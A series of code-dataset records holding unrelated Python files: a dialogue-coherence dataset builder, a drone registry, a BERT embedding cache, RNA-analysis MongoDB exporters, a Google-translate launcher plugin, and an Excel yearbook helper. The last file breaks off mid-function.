return permutations, segment_permutations\n\n    def swda_utterance_sampling(self, speaker_ixs, amount):\n        segm_ixs = self.speaker_segment_ixs(speaker_ixs)\n        segments = list(set(segm_ixs.values()))\n\n        permutations = []\n\n        for i in range(amount):\n            (sentence, act, swda_name, ix) = self.draw_rand_sent()\n            insert_ix = random.choice(segments)\n            permutations.append((sentence, act, swda_name, ix, insert_ix))\n\n        return permutations\n\n    def convert_dset(self, amounts):\n        # create distinct train/validation/test files. they'll correspond to the created\n        # splits from the constructor\n        
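# (added note) each output row has the form label|acts|utts|perm_acts|perm_utts; every perturbation is written twice, with label 0 (original first) and label 1 (perturbed first)\n        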
train_output_file = os.path.join(self.data_dir, 'train', 'coherency_dset_{}.txt'.format(self.task))\n        val_output_file = os.path.join(self.data_dir, 'validation', 'coherency_dset_{}.txt'.format(self.task))\n        test_output_file = os.path.join(self.data_dir, 'test', 'coherency_dset_{}.txt'.format(self.task))\n        if not os.path.exists(os.path.join(self.data_dir, 'train')):\n            os.makedirs(os.path.join(self.data_dir, 'train'))\n        if not os.path.exists(os.path.join(self.data_dir, 'validation')):\n            os.makedirs(os.path.join(self.data_dir, 'validation'))\n        if not os.path.exists(os.path.join(self.data_dir, 'test')):\n            os.makedirs(os.path.join(self.data_dir, 'test'))\n\n        trainfile = open(train_output_file, 'w')\n        valfile = open(val_output_file, 'w')\n        testfile = open(test_output_file, 'w')\n\n        shuffled_path = os.path.join(self.data_dir, \"shuffled_{}\".format(self.task))\n        if not os.path.isdir(shuffled_path):\n            os.mkdir(shuffled_path)\n\n        for i, trans in enumerate(tqdm(self.corpus.iter_transcripts(display_progress=False), total=1155)):\n            utterances = []\n            acts = []\n            speaker_ixs = []\n            prev_act = \"%\"\n            for utt in trans.utterances:\n                sentence = re.sub(r\"([+/\\}\\[\\]]|\\{\\w)\", \"\",\n                        utt.text)\n                sentence = self.word2id(self.tokenizer(sentence))\n                utterances.append(sentence)\n                act = utt.damsl_act_tag()\n                if act is None: act = \"%\"\n                if act == \"+\": act = prev_act\n                acts.append(self.da2num[act])\n                prev_act = act\n                if \"A\" in utt.caller:\n                    speaker_ixs.append(0)\n                else:\n                    speaker_ixs.append(1)\n\n            if self.task == 'up':\n                permuted_ixs, segment_perms = self.swda_permute(utterances, amounts, speaker_ixs)\n            elif self.task == 'us':\n                permuted_ixs = self.swda_utterance_sampling(speaker_ixs, amounts)\n            elif self.task == 'hup':\n                permuted_ixs, segment_perms = self.swda_half_perturb(amounts, speaker_ixs)\n            elif self.task == 'ui':\n                permuted_ixs, segment_perms = self.swda_utterance_insertion(speaker_ixs, amounts)\n            else:\n                raise ValueError(\"unknown task: {}\".format(self.task))\n\n            swda_fname = os.path.split(trans.swda_filename)[1]\n            shuffle_file = os.path.join(shuffled_path, swda_fname) # [:-4]\n            with open(shuffle_file, \"w\") as f:\n                csv_writer = csv.writer(f)\n                if self.task == 'us':\n                    for perm in permuted_ixs:\n                        (utt, da, name, ix, insert_ix) = perm\n                        row = [name, ix, insert_ix]\n                        csv_writer.writerow(row)\n                else:\n                    for perm in segment_perms:\n                        csv_writer.writerow(perm)\n\n            if self.task == 'us':\n                for p in permuted_ixs:\n                    a = \" \".join([str(x) for x in acts])\n                    u = str(utterances)\n                    insert_sent, insert_da, name, ix, insert_ix = p\n                    insert_da = self.da2num[insert_da]\n                    p_a = deepcopy(acts)\n                    p_a[insert_ix] = insert_da\n                    pa = \" \".join([str(x) for x in p_a])\n                    p_u = deepcopy(utterances)\n                    p_u[insert_ix] = insert_sent\n\n                    if i in self.train_ixs:\n                        trainfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"0\",a,u,pa,p_u))\n                        trainfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"1\",pa,p_u,a,u))\n                    if i in self.val_ixs:\n                        valfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"0\",a,u,pa,p_u))\n                        valfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"1\",pa,p_u,a,u))\n                    if i in self.test_ixs:\n                        testfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"0\",a,u,pa,p_u))\n                        testfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"1\",pa,p_u,a,u))\n\n            else:\n                for p in permuted_ixs:\n                    a = \" \".join([str(x) for x in acts])\n                    u = str(utterances)\n                    pa = [acts[i] for i in p]\n                    p_a = \" \".join([str(x) for x in pa])\n                    pu = [utterances[i] for i in p]\n                    p_u = str(pu)\n\n                    if i in self.train_ixs:\n                        trainfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"0\",a,u,p_a,p_u))\n                        
trainfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"1\",p_a,p_u,a,u))\n                    if i in self.val_ixs:\n                        valfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"0\",a,u,p_a,p_u))\n                        valfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"1\",p_a,p_u,a,u))\n                    if i in self.test_ixs:\n                        testfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"0\",a,u,p_a,p_u))\n                        testfile.write(\"{}|{}|{}|{}|{}\\n\".format(\"1\",p_a,p_u,a,u))\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--datadir\",\n                        required=True,\n                        type=str,\n                        help=\"\"\"The input directory where the files of the corpus\n                        are located. \"\"\")\n    parser.add_argument(\"--corpus\",\n                        required=True,\n                        type=str,\n                        help=\"\"\"the name of the corpus to use, currently either 'DailyDialog' or 'Switchboard' \"\"\")\n    parser.add_argument('--seed',\n                        type=int,\n                        default=42,\n                        help=\"random seed for initialization\")\n    parser.add_argument('--amount',\n                        type=int,\n                        default=20,\n                        help=\"number of perturbations to create per dialogue\")\n    parser.add_argument('--word2id',\n                        action='store_true',\n                        help=\"convert the words to ids\")\n    parser.add_argument('--task',\n                        required=True,\n                        type=str,\n                        default=\"up\",\n                        help=\"\"\"for which task the dataset should be created.\n                        alternatives: up (utterance permutation)\n                                      us (utterance sampling)\n                                      hup (half utterance perturbation)\n                                      ui (utterance insertion, nothing directly added!)\"\"\")\n\n    args = parser.parse_args()\n\n    random.seed(args.seed)\n    np.random.seed(args.seed)\n\n    if args.word2id:\n        f = open(os.path.join(args.datadir, \"itos.txt\"), \"r\")\n        word2id_dict = dict()\n        for i, word in enumerate(f):\n            word2id_dict[word[:-1].lower()] = i\n\n        word2id = lambda x: [word2id_dict[y] for y in x]\n    else:\n        word2id = lambda x: x # don't convert words to ids (yet). It gets done in the glove wrapper of mtl_coherence.py\n\n    tokenizer = word_tokenize\n    if args.corpus == 'DailyDialog':\n        converter = DailyDialogConverter(args.datadir, tokenizer, word2id, task=args.task)\n        converter.create_act_utt()\n    elif args.corpus == 'Switchboard':\n        converter = SwitchboardConverter(args.datadir, tokenizer, word2id, args.task, args.seed)\n        converter.create_vocab()\n\n    converter.convert_dset(amounts=args.amount)\n\ndef getKeysByValue(dictOfElements, valueToFind):\n    listOfKeys = list()\n    for item in dictOfElements.items():\n        if item[1] == valueToFind:\n            listOfKeys.append(item[0])\n    return listOfKeys\n\ndef switchboard_da_mapping():\n    mapping_dict = dict({\n        \"sd\": 1,\n        \"b\": 2,\n        \"sv\": 3,\n        \"aa\": 4,\n        \"%-\": 5,\n        \"ba\": 6,\n        \"qy\": 7,\n        \"x\": 8,\n        \"ny\": 9,\n        \"fc\": 10,\n        \"%\": 11,\n        \"qw\": 12,\n        \"nn\": 13,\n        \"bk\": 14,\n        \"h\": 15,\n        \"qy^d\": 16,\n        \"o\": 17,\n        \"bh\": 18,\n        \"^q\": 19,\n        \"bf\": 20,\n        \"na\": 21,\n        \"ny^e\": 22,\n        \"ad\": 23,\n        \"^2\": 24,\n        \"b^m\": 25,\n        \"qo\": 26,\n        \"qh\": 27,\n        \"^h\": 28,\n        \"ar\": 29,\n        \"ng\": 30,\n        \"nn^e\": 31,\n        \"br\": 32,\n        \"no\": 33,\n        \"fp\": 34,\n        \"qrr\": 35,\n        \"arp\": 36,\n        \"nd\": 37,\n        \"t3\": 38,\n        \"oo\": 39,\n        \"co\": 40,\n        \"cc\": 41,\n        \"t1\": 42,\n        \"bd\": 43,\n        \"aap\": 44,\n        \"am\": 45,\n        \"^g\": 46,\n        \"qw^d\": 47,\n        \"fa\": 48,\n        \"ft\": 49\n    })\n    d = defaultdict(lambda: 11)\n    for (k, v) in mapping_dict.items():\n        d[k] = v\n    return d\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"UKPLab/acl2020-dialogue-coherence-assessment","sub_path":"create_coherency_dataset.py","file_name":"create_coherency_dataset.py","file_ext":"py","file_size_in_byte":25426,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"82"}
+{"seq_id":"42488267136","text":"# ## Task 1. List generation\n# Given an integer N, write a program that\n# builds the list of odd numbers from 1 to N.\n#\n# Example 1\n# ```\n# Enter a number: 1\n#\n# List of odd numbers from 1 to N: [1]\n# ```\n#\n# Example 2\n# ```\n# Enter a number: 14\n#\n# List of odd numbers from 1 to N: [1, 3, 5, 7, 9, 11, 13]\n# ```\n\nn = int(input('Enter an integer N: '))\nn_list = []\n\nfor i in range(1, n + 1, 2):\n    n_list.append(i)\n
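\n# (added note) an equivalent list comprehension: n_list = [i for i in range(1, n + 1, 2)]\n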
\nprint('List of odd numbers from 1 to N:', n_list)\n\n","repo_name":"vyacheslav-79109734555/15_Basic-collections-Indexes-list-items","sub_path":"_Домашнее задание/task_01_list_gen/1_Генерация списка.py","file_name":"1_Генерация списка.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"4526395337","text":"import logging\nimport json\nimport os.path\n\n\nclass DroneStore():\n\n    def __init__(self):\n        self.__devices = None\n        self.__filename = 'drones.json'\n        self.__init_store()\n\n    def add(self, mac):\n\n        self.__devices.append(mac)\n        self.__write()\n\n    def remove(self, mac):\n        self.__devices = [d for d in self.__devices if d != mac]\n        self.__write()\n\n    def get(self, drone_id=0):\n\n        if drone_id == 0:\n            return self.__devices[1:]\n        elif drone_id < len(self.__devices):\n            return self.__devices[drone_id]\n        else:\n            return -1\n\n    def count(self):\n        if self.__devices is None:\n            return 0\n        else:\n            return len(self.__devices) - 1\n\n    def __write(self):\n        data = {\n            'drones': self.__devices\n        }\n        with open(self.__filename, \"w\") as write_file:\n            json.dump(data, write_file)\n\n    def __init_store(self):\n        if not os.path.isfile(self.__filename):\n            logging.info('Store %s not found -> creating' % self.__filename)\n            self.__devices = ['']\n            with open(self.__filename, \"w\") as write_file:\n                json.dump({'drones': self.__devices}, write_file)\n        else:\n            logging.info(\"Loading drones store from %s\" % self.__filename)\n            self.__devices = []\n            with open(self.__filename, \"r\") as read_file:\n                data = json.load(read_file)\n                for mac in data['drones']:\n                    self.__devices.append(mac)\n","repo_name":"jonasauda/flyables","sub_path":"dronecontrol/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"}
+{"seq_id":"74252443469","text":"'''\nA wrapper for interacting with bert-as-service (https://github.com/hanxiao/bert-as-service)\n'''\n\n\nimport os.path\nimport pickle\n\nimport numpy as np\nfrom bert_serving.client import BertClient\n\nFILE = './embeddings.db'\n\nif os.path.isfile(FILE):\n    embeddings_on_disk = pickle.load(open(FILE, 'rb'))\nelse:\n    embeddings_on_disk = {}\n\nbert_client = BertClient()\n\ndef bert_sent_embeddings(sents, batch_size=250, persist=True):\n    size_before = len(embeddings_on_disk)\n\n    chunks = max(1, int(len(sents) / batch_size))\n    splits = np.array_split(sents, chunks)\n\n    return_list = []\n    for split in splits:\n        return_list += _bert_sent_embeddings(split.tolist())\n\n    # only print if we're doing batch\n    if len(sents) > 1:\n        print(\"Processed:\", len(return_list), \"of\", len(sents))\n\n    size_after = len(embeddings_on_disk)\n\n    if persist and size_after > size_before:\n        save()\n\n    return return_list\n\n\ndef _bert_sent_embeddings(sents):\n    todo_sents = [s for s in sents if s not in embeddings_on_disk]\n\n    if len(todo_sents) > 0:\n        retrieved_embeddings = bert_client.encode(todo_sents, is_tokenized=False)\n\n        
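# (added note) one embedding vector is expected per submitted sentence\n        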
assert len(retrieved_embeddings) == len(todo_sents)\n\n\n        for sent, vec in zip(todo_sents, retrieved_embeddings):\n            embeddings_on_disk[sent] = vec\n\n    return [embeddings_on_disk[s] for s in sents]\n\ndef save():\n    pickle.dump(embeddings_on_disk, open(FILE, 'wb+'))\n\n\n","repo_name":"OHNLP/clinical-problem-standardization","sub_path":"embedding/bert.py","file_name":"bert.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"82"}
+{"seq_id":"3895713902","text":"from itertools import accumulate\r\nimport operator\r\n\r\nnums = range(1, 101)\r\n\r\n# The results from 1 to 100 cumulatively added\r\nresults_added = accumulate(nums, operator.add)\r\nprint(results_added)\r\n\r\nfor item in results_added:\r\n    print(item)\r\n\r\n# The results from 1 to 100 cumulatively subtracted\r\nresults_subtracted = accumulate(nums, operator.sub)\r\nprint(results_subtracted)\r\n\r\nfor item in results_subtracted:\r\n    print(item)\r\n","repo_name":"sourcery-ai-bot/library-python","sub_path":"standard_library/mod_itertools/accumulate.py","file_name":"accumulate.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"40583442995","text":"# -*- coding: utf-8 -*-\n# __author__ = 'shicaiping'\nfrom __future__ import division\nimport os\nfrom biocluster.config import Config\nfrom bson.objectid import ObjectId\nimport types\nimport json\nimport re\nfrom types import StringTypes\nimport gridfs\nfrom collections import OrderedDict\nimport pandas as pd\nimport unicodedata\nfrom biocluster.file import getsize, exists\nfrom biocluster.file import download\n\nproject_type = 'denovo_rna_v2'\ndb = Config().get_mongo_client(mtype=project_type)[Config().get_mongo_dbname(project_type)]\n\ndef export_upset_venn(data, option_name, dir_path, bind_obj=None):\n    gene_list_path = os.path.join(dir_path, \"upset_venn.txt\")\n    bind_obj.logger.debug(\"Exporting the gene sets\")\n    collection = db['sg_geneset_detail']\n    main_collection = db['sg_geneset']\n    geneset_id_list = data.split(',')\n    gene_list_all = list()\n    gene_name_seq = dict()\n    for i in geneset_id_list:\n        my_result = main_collection.find_one({'main_id': ObjectId(i)})\n        if not my_result:\n            bind_obj.set_error(\"Unexpected error: geneset_id {} was not found in sg_geneset!\".format(ObjectId(i)))\n        geneset_name = my_result['name']\n        results = collection.find_one({\"geneset_id\": ObjectId(i)})\n        gene_list = results['seq_list']\n        gene_name_seq[geneset_name] = gene_list\n        gene_list_all.extend(gene_list)\n    df = pd.DataFrame.from_dict(gene_name_seq, orient='index').T\n    df.to_csv(gene_list_path, header=True, index=False, sep='\\t')\n    # with open(gene_list_path, 'w') as f:\n    #     a = gene_name_seq.keys()\n    #     b = '\\t'.join(a)\n    #     f.write(b + '\\n')\n    #     for i in gene_list_all:\n    #         num_list = list()\n    #         for j in a:\n    #             if i in gene_name_seq[j]:\n    #                 num_list.append(str(1))\n    #             else:\n    #                 num_list.append(\"\")\n    #         f.write('\\t'.join(num_list) + '\\n')\n    return gene_list_path\n\ndef export_diff_plot(data, option_name, dir_path, bind_obj=None):\n    '''\n    Export gene_id, log2fc and pvalue from the differential expression analysis\n    '''\n    diff_id = bind_obj.sheet.option('diff_id')\n    compare_group = bind_obj.sheet.option('compare')\n    target_cols = OrderedDict(seq_id=1, log2fc=1, pvalue=1, _id=0)\n    bind_obj.logger.debug(\"Exporting expression columns {}\".format(target_cols))\n    conn = db['sg_diff_detail']\n    diff_exp_records = conn.find({\"diff_id\": ObjectId(diff_id), \"compare\": compare_group}, target_cols)\n    
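# (added note) materialize the cursor into a DataFrame, fix the column order, and drop incomplete rows\n    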
diff_exp_matrix = pd.DataFrame(list(diff_exp_records))\n    column_order = ['seq_id', 'log2fc', 'pvalue']\n    diff_exp_matrix = diff_exp_matrix[column_order].dropna(axis=0)\n    output = os.path.join(dir_path, 'diff_plot.txt')\n    diff_exp_matrix.to_csv(output, sep='\\t', header=True, index=False)\n    print('successfully exported the differential expression matrix')\n    return output\n\n","repo_name":"bensonlew/rnawl","sub_path":"src/mbio/api/to_file/denovo_rna_tool.py","file_name":"denovo_rna_tool.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"82"}
+{"seq_id":"14958911962","text":"import hashlib\nimport http.client\nimport json\nimport re\nimport urllib.parse\nimport urllib.request\n\n# import requests\nfrom catapult.api import (Plugin, SearchResult, copy_text_to_clipboard,\n                          lookup_icon)\nfrom catapult.i18n import _\n\ncache = {}\n\nPATTERN = re.compile(r\"^tr\\s([a-z]{2})\\s([a-z]{2})\\s(.*)\\s\")\n\n\nclass TranslatorPlugin(Plugin):\n    save_history = False\n    title = _(\"Translator\")\n    cache_key = \"\"\n\n    def __init__(self):\n        super().__init__()\n        self.endpoint = \"/translate_a/single\"\n        self.headers = {\n            \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\n            \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n            \"X-Requested-With\": \"XMLHttpRequest\",\n            \"Referer\": \"https://translate.google.com/\",\n            \"Origin\": \"https://translate.google.com\",\n        }\n        self.url = \"translate.googleapis.com\"\n        self.conn = http.client.HTTPSConnection(self.url)\n        self.num_conn = 0\n\n    def google_translate(self, text, source_language, target_language):\n        self.cache_key = hashlib.md5(\n            f\"{text}{source_language}{target_language}\".encode()\n        ).hexdigest()\n        if self.cache_key in cache:\n            return cache[self.cache_key]\n\n        params = {\n            \"client\": \"gtx\",\n            \"sl\": source_language,\n            \"tl\": target_language,\n            \"dt\": \"t\",\n            \"q\": text,\n        }\n\n        data = urllib.parse.urlencode(params).encode(\"utf-8\")\n\n        self.conn.request(\"POST\", self.endpoint, data, self.headers)\n\n        response = self.conn.getresponse()\n\n        result_text = response.read().decode()\n\n        # self.conn.close()\n\n        try:\n            result = json.loads(result_text)\n            result_text = result[0][0][0]\n        except (json.JSONDecodeError, IndexError):\n            result_text = \"\"\n\n        cache[self.cache_key] = result_text\n        self.num_conn += 1\n        if self.num_conn == 10:\n            # recycle the HTTPS connection every 10 requests and reset the counter\n            self.conn.close()\n            self.conn = http.client.HTTPSConnection(self.url)\n            self.num_conn = 0\n        return result_text\n\n    def launch(self, window, id):\n        copy_text_to_clipboard(cache.get(self.cache_key, \"\"))\n\n    def search(self, query):\n        match = re.match(PATTERN, query)\n        if not match:\n            return\n\n        src, dest, text = match.groups()\n        result = self.google_translate(text, src, dest)\n        if result:\n            yield SearchResult(\n                description=result,\n                fuzzy=False,\n                icon=lookup_icon(\n                    \"gnome-translate\",\n                    \"deepin-translator\",\n                    \"org.gnome.Translate\",\n                    \"org.gnome.Translate\",\n                    \"application-x-executable\",\n                ),\n                id=\"0\",\n                offset=0,\n                plugin=self,\n                score=1,\n                title=\"Translation\",\n            )\n\n\n# def google_translate(self, text, source_language, target_language):\n#     cache_key = hashlib.md5(\n#         f\"{text}{source_language}{target_language}\".encode()\n#     ).hexdigest()\n#     if cache_key in cache:\n#         return cache[cache_key]\n#\n#     url = \"https://translate.googleapis.com/translate_a/single\"\n#     params = {\n#         \"client\": \"gtx\",\n#         \"sl\": source_language,\n#         
\"tl\": target_language,\n# \"dt\": \"t\",\n# \"q\": text,\n# }\n# headers = {\n# \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"\n# }\n# try:\n# response = requests.get(\n# url, params=params, headers=headers, timeout=3\n# ).json()\n# result = response[0][0][0]\n# cache[cache_key] = result\n# except:\n# result = None\n# return result\n#\n# def search(self, query):\n# match = re.match(PATTERN, query)\n# if not match:\n# return\n#\n# src, dest, text = match.groups()\n# result = self.google_translate(text, src, dest)\n#\n# if result:\n# yield SearchResult(\n# description=result,\n# fuzzy=False,\n# icon=lookup_icon(\n# \"gnome-translate\",\n# \"deepin-translator\",\n# \"org.gnome.Translate\",\n# \"org.gnome.Translate\",\n# \"application-x-executable\",\n# ),\n# id=result,\n# offset=0,\n# plugin=self,\n# score=1,\n# title=\"Traduccion\",\n# )\n\n# def google_translate(self, text, source_language, target_language):\n# base_url = \"https://translate.googleapis.com/translate_a/single?client=gtx&sl={0}&tl={1}&dt=t&q={2}\"\n# url = base_url.format(\n# source_language, target_language, urllib.parse.quote(text)\n# )\n# headers = {\n# \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"\n# }\n# req = urllib.request.Request(url, headers=headers)\n# response = urllib.request.urlopen(req).read().decode(\"utf-8\")\n# result = json.loads(response)[0][0][0]\n# return result\n#\n# def search(self, query):\n# match = re.match(PATTERN, query)\n# if not match:\n# return\n#\n# src, dest, text = match.groups()\n# result = self.google_translate(text, src, dest)\n#\n# if result:\n# yield SearchResult(\n# description=result,\n# fuzzy=False,\n# icon=lookup_icon(\n# \"gnome-translate\",\n# \"deepin-translator\",\n# \"org.gnome.Translate\",\n# \"org.gnome.Translate\",\n# \"application-x-executable\",\n# ),\n# id=result,\n# offset=0,\n# plugin=self,\n# score=1,\n# title=\"Traduccion\",\n# )\n","repo_name":"CRAG666/dotfiles","sub_path":"local/share/catapult/plugins/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":6024,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"82"} +{"seq_id":"42124616794","text":"# -*- coding: utf-8 -*-\n\n################################################################################################\n# Plataforma para la Iniciativa Regional de Monitoreo Hidrológico de Ecosistemas Andinos (iMHEA)\n# basada en los desarrollos realizados por:\n# 1) FONDO PARA LA PROTECCIÓN DEL AGUA (FONAG), Ecuador.\n# Contacto: info@fonag.org.ec\n# 2) EMPRESA PÚBLICA METROPOLITANA DE AGUA POTABLE Y SANEAMIENTO DE QUITO (EPMAPS), Ecuador.\n# Contacto: paramh2o@aguaquito.gob.ec\n#\n# IMPORTANTE: Mantener o incluir esta cabecera con la mención de las instituciones creadoras,\n# ya sea en uso total o parcial del código.\n\nfrom django.db.models import Avg\n\n# librerias para manejar los archivos EXCEL\nfrom openpyxl.styles import Alignment, Border, Font, PatternFill, Side\n\nfrom anuarios.models import (\n Var1Anuarios,\n Var2Anuarios,\n Var3Anuarios,\n Var6Anuarios,\n Var8Anuarios,\n Var9Anuarios,\n Var10Anuarios,\n Var11Anuarios,\n)\nfrom validacion_v2.functions import normalize\nfrom variable.models import Variable\n\n\nclass Titulos:\n # Estilo de Fuentes\n fonts = {\n \"font_bold_11\": Font(bold=True),\n \"font_bold_10\": Font(bold=True, size=10),\n \"font_10\": 
Font(size=10),\n        \"font_11\": Font(size=11),\n        \"font_8\": Font(size=8),\n    }\n    # Cell alignment\n    alignments = {\n        \"center\": Alignment(horizontal=\"center\", vertical=\"center\"),\n        \"right\": Alignment(horizontal=\"right\", vertical=\"center\"),\n        \"left\": Alignment(horizontal=\"left\", vertical=\"center\"),\n        \"wrap\": Alignment(horizontal=\"center\", vertical=\"center\", wrap_text=True),\n    }\n    thin = Side(border_style=\"thin\", color=\"000000\")\n    medium = Side(border_style=\"medium\", color=\"000000\")\n    # borders\n    borders = {\n        \"border_thin\": Border(top=thin, left=thin, bottom=thin, right=thin),\n        \"border_medium\": Border(top=medium, left=medium, right=medium, bottom=medium),\n    }\n    # fill\n    colors = {\n        \"orange\": PatternFill(\"solid\", fgColor=\"FDE9D9\"),\n        \"light_salmon\": PatternFill(\"solid\", fgColor=\"FFA07A\"),\n    }\n\n    @staticmethod\n    def titulo_grafico(variable):\n        # returns var_nombre given var_id\n        consulta = list(Variable.objects.filter(var_id=variable))\n\n        return consulta[0]\n\n    @staticmethod\n    def titulo_unidad(variable):\n        var = Variable.objects.get(var_id=variable)\n        return var.uni_id.uni_sigla\n\n    @staticmethod\n    def consulta(estacion, variable, periodo):\n        if variable.var_id == 1:\n            informacion = list(\n                Var1Anuarios.objects.filter(est_id=estacion).filter(pre_periodo=periodo)\n            )\n        elif variable.var_id == 2:\n            informacion = list(\n                Var2Anuarios.objects.filter(est_id=estacion).filter(tai_periodo=periodo)\n            )\n        elif variable.var_id == 3:\n            informacion = list(\n                Var3Anuarios.objects.filter(est_id=estacion).filter(hai_periodo=periodo)\n            )\n        elif variable.var_id == 6:\n            informacion = list(\n                Var6Anuarios.objects.filter(est_id=estacion).filter(hsu_periodo=periodo)\n            )\n        elif variable.var_id == 8:\n            informacion = list(\n                Var8Anuarios.objects.filter(est_id=estacion).filter(pat_periodo=periodo)\n            )\n        elif variable.var_id == 9:\n            informacion = list(\n                Var9Anuarios.objects.filter(est_id=estacion).filter(tag_periodo=periodo)\n            )\n        elif variable.var_id == 10:\n            informacion = list(\n                Var10Anuarios.objects.filter(est_id=estacion).filter(\n                    cau_periodo=periodo\n                )\n            )\n        elif variable.var_id == 11:\n            informacion = list(\n                Var11Anuarios.objects.filter(est_id=estacion).filter(\n                    nag_periodo=periodo\n                )\n            )\n        return informacion\n\n    @staticmethod\n    def datos_historicos(estacion, variable, periodo):\n        modelo = \"Var\" + str(variable.var_id) + \"Anuarios\"\n        modelo = globals()[modelo]\n        consulta = modelo.objects.filter(est_id=estacion)\n        mes = str(variable.var_codigo).lower() + \"_mes\"\n        promedio = str(variable.var_codigo).lower() + \"_promedio\"\n        if variable.var_id == 2:\n            consulta = consulta.exclude(tai_periodo=periodo).values(mes)\n        elif variable.var_id == 3:\n            consulta = consulta.exclude(hai_periodo=periodo).values(mes)\n        elif variable.var_id == 6:\n            consulta = consulta.exclude(hsu_periodo=periodo).values(mes)\n        elif variable.var_id == 8:\n            consulta = consulta.exclude(pat_periodo=periodo).values(mes)\n        elif variable.var_id == 9:\n            consulta = consulta.exclude(tag_periodo=periodo).values(mes)\n        elif variable.var_id == 10:\n            consulta = consulta.exclude(cau_periodo=periodo).values(mes)\n        elif variable.var_id == 11:\n            consulta = consulta.exclude(nag_periodo=periodo).values(mes)\n\n        informacion = list(consulta.annotate(valor=Avg(promedio)).order_by(mes))\n\n        datos = []\n        for item in informacion:\n            datos.append(item[\"valor\"])\n        return datos\n\n    def set_encabezado_excel(self, ws, estacion, periodo):\n        fila = 1\n        col = 1\n        col_fin = 11\n\n        ws.merge_cells(\n            
start_row=fila, start_column=col, end_row=fila, end_column=col + 2\n )\n title = ws.cell(row=fila, column=col)\n title.value = estacion.est_codigo\n self.set_style(\n cell=title,\n font=\"font_bold_11\",\n alignment=\"center\",\n border=\"border_thin\",\n fill=\"light_salmon\",\n )\n\n ws.merge_cells(\n start_row=fila, start_column=col + 3, end_row=fila, end_column=col + 7\n )\n title = ws.cell(row=fila, column=col + 3)\n title.value = estacion.est_nombre\n self.set_style(\n cell=title,\n font=\"font_bold_11\",\n alignment=\"center\",\n border=\"border_thin\",\n fill=\"light_salmon\",\n )\n\n ws.merge_cells(\n start_row=fila, start_column=col + 8, end_row=fila, end_column=col_fin\n )\n title = ws.cell(row=fila, column=col + 8)\n title.value = periodo\n self.set_style(\n cell=title,\n font=\"font_bold_11\",\n alignment=\"center\",\n border=\"border_thin\",\n fill=\"light_salmon\",\n )\n\n fila += 1\n\n ws.merge_cells(\n start_row=fila, start_column=col, end_row=fila, end_column=col_fin\n )\n title = ws.cell(row=fila, column=col)\n title.value = \"Coordenadas Geográficas\"\n self.set_style(\n cell=title, font=\"font_bold_11\", alignment=\"center\", border=\"border_thin\"\n )\n\n fila += 1\n\n cell = ws.cell(row=fila, column=col)\n cell.value = \"Latitud\"\n self.set_style(\n cell=cell, font=\"font_bold_10\", alignment=\"center\", border=\"border_thin\"\n )\n\n ws.merge_cells(\n start_row=fila, start_column=col + 1, end_row=fila, end_column=col + 3\n )\n title = ws.cell(row=fila, column=col + 1)\n title.value = estacion.est_latitud\n self.set_style(\n cell=title, font=\"font_10\", alignment=\"center\", border=\"border_thin\"\n )\n\n cell = ws.cell(row=fila, column=col + 4)\n cell.value = \"Longitud\"\n self.set_style(\n cell=cell, font=\"font_bold_10\", alignment=\"center\", border=\"border_thin\"\n )\n\n ws.merge_cells(\n start_row=fila, start_column=col + 5, end_row=fila, end_column=col + 7\n )\n title = ws.cell(row=fila, column=col + 5)\n title.value = estacion.est_longitud\n self.set_style(\n cell=title, font=\"font_10\", alignment=\"center\", border=\"border_thin\"\n )\n\n cell = ws.cell(row=fila, column=col + 8)\n cell.value = \"Altura\"\n self.set_style(\n cell=cell, font=\"font_bold_10\", alignment=\"center\", border=\"border_thin\"\n )\n\n ws.merge_cells(\n start_row=fila, start_column=col + 9, end_row=fila, end_column=col_fin\n )\n title = ws.cell(row=fila, column=col + 9)\n title.value = estacion.est_altura\n self.set_style(\n cell=title, font=\"font_10\", alignment=\"center\", border=\"border_thin\"\n )\n\n def bordes_celdas(self, ws, start_row, start_column, end_row, end_column):\n for fil in range(start_row, end_row + 1):\n for col in range(start_column, end_column + 1):\n cell = ws.cell(row=fil, column=col)\n self.set_style(cell=cell, border=\"border_thin\")\n\n @staticmethod\n def get_mes_anio(int_mes):\n # meses = ['Enero', 'Febrero','Marzo', 'Abril', 'Mayo', 'Junio', 'Julio','Agosto',\n # 'Septiembre','Octubre','Noviembre','Diciembre']\n meses = [\n \"ENE\",\n \"FEB\",\n \"MAR\",\n \"ABR\",\n \"MAY\",\n \"JUN\",\n \"JUL\",\n \"AGO\",\n \"SEP\",\n 